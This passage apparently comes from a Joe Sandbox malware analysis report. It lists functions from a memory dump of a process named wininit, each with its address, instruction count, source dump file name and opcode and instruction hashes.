                                                                  • Instruction ID: 3937cb1a09217ae5469e92f7a915eff9bb2c57aaa173ee19b39fff2e02c5c05d
                                                                  • Opcode Fuzzy Hash: 566ddb936fc73ed22d18cc18429ce0e285565245f39fd1aa5e5c81b9e4ae94ed
                                                                  • Instruction Fuzzy Hash: FD31DE21B1DA494FE798EB2C945A37DA6C2EF98795F0405BEF40EC32D7DE689C428341
                                                                  Function 00007FF848AE0D21 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9eedebf2c55f0e33b2084d87c7687a21b98dbe0bf35072426caefd31cfc7346c
                                                                  • Instruction ID: 0fdf1e0b7f0689a601a14d8de8f498e28bc20c661ae60012783ed93d657a911f
                                                                  • Opcode Fuzzy Hash: 9eedebf2c55f0e33b2084d87c7687a21b98dbe0bf35072426caefd31cfc7346c
                                                                  • Instruction Fuzzy Hash: B731B221B1DA495FE744BBB8585A3BDB6D2EF98751F0446BAE40DC3283DE2C58418392
                                                                  Function 00007FF848AE0BD3 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60ae72b25f94e463db3741e542eb020c30496e9742b57f9f601cb4b7ea85c2c4
                                                                  • Instruction ID: 78746fe768c49694cb81b49e0b5ac3a80d6fe105d2a476caf8f630168d5c9e63
                                                                  • Opcode Fuzzy Hash: 60ae72b25f94e463db3741e542eb020c30496e9742b57f9f601cb4b7ea85c2c4
                                                                  • Instruction Fuzzy Hash: 4941BF31A1DA0E9FEB44FB7894666FDBBB1FF88301F544979D508D3283CE2868458B51
                                                                  Function 00007FF848AE0870 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a6fc3ddd6c92f25c7984efd711d0e14b9c5038947ef6f08899286a7dcbbd931
                                                                  • Instruction ID: 371af10627a8b7b461f86748dba0482f7d31aeee48c60bb53c3b161756366067
                                                                  • Opcode Fuzzy Hash: 2a6fc3ddd6c92f25c7984efd711d0e14b9c5038947ef6f08899286a7dcbbd931
                                                                  • Instruction Fuzzy Hash: 9721B12594A64D9FD744EB3890A5AEDBF71EF89304F8444B9DA48C3387CD246A009B51
                                                                  Function 00007FF848AE22C1 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.3276464648.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_7ff848ae0000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd4b49d34812a77574c6a2251d4d65ab1bc474b1438200d6986eab6a61d3b7d7
                                                                  • Instruction ID: d6aaf9e95b5524e68efc06ee9a69b6ca21a02769dade6c5b05c40618b834653c
                                                                  • Opcode Fuzzy Hash: fd4b49d34812a77574c6a2251d4d65ab1bc474b1438200d6986eab6a61d3b7d7
                                                                  • Instruction Fuzzy Hash: BB01261490E7C50FE781F738181A47A7FF0DFD1384F4808BAE888C6097D94C99848357